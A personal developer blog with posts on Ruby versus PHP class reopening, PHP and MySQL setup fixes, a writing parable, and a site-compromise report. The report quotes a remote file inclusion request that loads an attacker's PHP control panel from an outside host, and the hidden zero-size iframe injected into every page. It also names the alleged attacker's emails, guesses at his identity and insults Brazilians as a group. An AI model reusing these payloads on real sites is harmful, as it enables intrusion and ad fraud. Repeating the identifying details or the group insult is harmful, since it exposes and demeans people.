soledad penadés

repeat 4[fd 100 rt 90]

I know the title is harsh but it's so true. At least it is according to nowadays php's implementation of classes and objects, which do not permit to "reopen" and add or redefine new methods to an existing class definition, which is the basis upon Rails (and I presume lots more of applications and frameworks) is built.

This ruby feature managed to freak me out when I first read about it. Redefining an existing class? Who would think of it as a good idea? Where is the maintainability and the good practices of object oriented programming? How can we rely on some class behaving as expected if some piece of code is changing its internal behaviour?

But then I got the answer - when used within reason, this allows you to extend existing classes. Extend. Morph. Adapt. Improve. Refine. Lots of concepts which started jumping around me and made me understand all in a sudden how Rails plugins worked so seamlessly, without having to do any extra include, or without having to touch Rails very core files, or defining hooks at certain places. If you don't like some aspect of Active Record, you could write a plugin which overwrites that behaviour - only that one. The rest remains the same.

The aesthetics is somehow shocking for php-only programmers. It's something like this:

class A
function hello_world
puts "I'm hello_world"
end

Any instance of A running hello_world will output "I'm hello_world"

But if you add this anywhere after the definition of A

class A
function hello_world
puts "I'm hello_world v2"
end

and run hello_world again, you will get "I'm hello_world v2". Which definitely is impossible to do in PHP - you would get a Fatal error: Cannot redeclare class error as soon as you tried to "reopen" a class and add or redefine some methods.

While this is not a problem for the average use of php, it turns to be the opposite when you want to do something smart with php5's new and shiny objects model. Something like, for example, building a cool framework like Rails.

There have been some attempts already, like for example CakePHP or Symfony. I just have experience with CakePHP and while it is magnifically built (given that it maintains compatibility with php4 and php5) it will never reach the whole expressivity and power that Rails has.

A quick example is the AppModel class. AppModel is the CakePHP's equivalent of ActiveRecord::base. In Rails, when you declare a model you just extend ActiveRecord. Simple as that; you don't need extra stuff in the middle. In CakePHP you need to extend AppModel, and if you want to modify AppModel in your application, you have to write a new AppModel.php - which cake will load instead of the default, empty one. Yes, AppModel is an empty class whose sole purpose is extending Model (which has the real ActiveRecord-like methods). That doesn't sound very flexible.

So at the end, AppModel is not more than a simple intermediate step for overcoming the limitation of php's inability to redefine the underlying class, that is, Model. We need to add an extra class in the middle for each level that you anticipate the user of your classes will want to redefine or extend.

Meanwhile, in Rails you would just add some code in the plugins directory with the new functions for ActiveRecord, and your models would still extend ActiveRecord::base. No extra levels of hierarchy whatsoever.

Another interesting example is the famous acts_as_taggable plugin, which allows programmers to add the ability to tag items (i.e. ActiveRecord models) just by adding a single line of code to the model (acts_as_taggable), using ruby's ability to reopen classes and add a series of new methods to existing models.

Even more, there are some Ruby core classes, like Date, to which Rails adds new methods, while they still belong to the Date object, not an artificial AppDate intermediate object in the middle, and without modifying Ruby's core files. Isn't it beatiful?

And before you discard my arguments as biased towards Rails, there are more languages which allow for classes to be reopened, like Javascript (and I believe ActionScript was like that before, don't know about ActionScript 3). These flexible languages have allowed people to write such amazing stuff as Prototype or Script.aculo.us, by making use of the redefinition and extension of existing classes.

So that's why I say that PHP is not flexible and will never have a real Rails-like framework :-)

Hope it's clearer now…

XSL support in php5 is deactivated by default. Go to Synaptic Package Manager and search for php5-xsl. Mark the package for installation, apply the changes and once it's finished, don't forget to restart the server!

sudo /usr/sbin/apache2 -k restart
More XSL stories later on… time to experiment :)

Two authors were discussing about their writing methods and specially, about the paper they used to write in. The first writer (let's call him Phil) used to prepare himself ruled paper sheets, because -he argued- it was the only method to know exactly how the rules were spread across each sheet, so he could control the height between lines, the amount and exact tone of the ink used to print the rules, etc. The second writer (called Rube) used to prepare the ruled paper but he gave up quickly and decided to just buy ruled paper notebooks, so that he could concentrate on the actual writing instead of the rules alignment.

At the end, Phil's home-made sheets were just quite messy and didn't look as professional and serious as Rube's one. Rube was always able to deliver the books on time, while Phil spent hours and hours improving his custom made method for drawing rules and making sure it was efficient and fast. Often the method failed and he had to restart from scratch.
No wonder Phil's father was a very weird architect which believed in making his own bricks. He took it with lots of dedication and pride but was only able to finish a couple of buildings in his life. Going up the family tree, Phil's grandfather was a mechanic which absolutely defended the need to build oneselves' wheels and tyres and re-engineer their design with every new patron which came to his little workshop.

Phil thinks Rube is a pretentious arrogant guy trying to impress women in any of the multiple social acts which he can attend (as he's got lots of free time thanks to just using conventional ruled paper when writing), and would like to be able to say this to the entire world but he's just too busy drawing lines in order to do any actual work at the end.

I was trying to run bake script (for cakephp!) and it started complaining about not finding /var/mysql/mysql.sock - but why this path? I already had problems with mysql socket and ruby on rails. In that time, I was using xampp for apache, php and mysql, so the mysql socket was inside xampp folder and I could solve it thanks to ccm (see the post if you feel curious).

But past week I decided I was fed up with xampp and not knowing where are the things, and more specially, not having a working version of Apache with mod_rewrite, so I went for the hard way and compiled and installed all from scratch (apache, php, mysql). Then what happened is that mysql socket is now in /tmp/mysql.sock but for some reason cake (and obviously php) is looking for the socket in /var/mysql/mysql.sock. Why, I don't know - since the application I'm developing works perfectly (I presume that's because it's running in a virtual host and thus php doesn't try to connect with localhost but with http, as it believes that it's not localhost actually).

In any case, it's just bake which fails.

Well, it was just bake which failed, since I decided to solve it all quickly. Did it want a socket in /var/mysql/mysql.sock?

There you go! Open a terminal and…

cd /var
sudo mkdir mysql (if a mysql directory doesn't exist there)
sudo ln -s /tmp/mysql.sock /var/mysql/mysql.sock

bye bye error! now enjoy bake!

This trick is maybe dirty but I'm fed up of running ./configure and friends. If you know why it failed before, you can leave a comment… and I'll appreciate it much :)

We just found some html attached to the end of every html and php file for almost all of our sites. How come, we asked?

I took a look at the server logs for every domain. I was looking for a POST request, since I figured out that it must had been some script kiddie trying to break into our pages with this dumb method. In little time I found that, something as suspicious as the following:

201.13.14.216 - - [27/May/2006:22:40:52 +0000] "GET /index.php?go=http%3A%2F%2Fwww.tnwhunters.com%2Fcmd01.txt%3F&&s=r&cmd=dir&dir=. HTTP/1.1" 200 3819 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.7.7) Gecko/20050421 Firefox/1.0.3 (Debian package 1.0.3-2)"

If you open the included url (http://www.tnwhunters.com/cmd01.txt) you see that the server is returning a plain text file which was interpreted as php by the script in neonv2, hence adding all the code that he put on that file available to him. (Obviously we have fixed it immediately and you can't do it anymore). Also, the page for server itself is related to animal huntings, which is completely offtopic. Weird…
That code (take a look, it won't open any pop up… it's simple plain text) is a complete control panel for wannabe hackers. They just need to look for a site with a simple method of loading sections (i.e., including one file depending on the current section) and just explode it, by getting their control panel loaded. Which curiously is half written in Brazilian. The IP of the idiot also corresponds to Brazil, Sao Paulo, as verified by dnsstuff.
The question is why did this idiot add this piece of html to every page and script? Not for becaming famous since the script doesn't produce any visible output. No. It's because he wanted to earn money. So he added a code like this:

iframe width=0 height=0 frameborder=0 xsrc=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 …

This code apparently belongs to an affiliates programme (sited in China) in which he would get paid for each impression the servers at free20 received with his affiliate program. As he included it in an iframe, the page was loaded on the users' computers but never seen, since the iframe dimensions are 0×0 pixels. But he is so stupid that he uses the same affiliate code as the nick he uses for:

• submitting security announcements (which curiously corresponds to the same description of the vulnerabilities he explodes for earning money)
• signing up in gmail (soauker@gmail.com)
• writing in forums defending the hackers against the system, also providing another e-mail address: jpfg@zipmail.com.br. This address could correspond to his real name initials.

It is easy to confirm that both soauker's are the same even if they don't have the same e-mail addresses because he still uses "Adivinha seuburro" as faked name, both in the security announcement and in this forum post as well. Curiously, the forum is related to FreeBSD and in his attacks he used a *nix system, Debian. All matches.

There are also some posts in the forum of a Computer Science institute with the same nick, Soauker. Although the page does not exist anymore, Google's cache can show you his favourite topics, which still are referred to linux. So maybe someone at the Instituto de Informática - PUCMINAS knows a guy which studied there on 2004 and was deeply interested in hacking and *nix systems.

So brazilians hadn't enough with spamming our nice orkut's scrapbooks with crap messages, now they also try to earn money the quick way. Ridiculous…

It is a pity that I can't find any website or abuse e-mail address for his internet provider so I could send them the logs he produced, but anyway I hope this is useful for someone.

Final advice: always always always filter input arguments for your script.

And for Soauker: GET A FUCKING LIFE!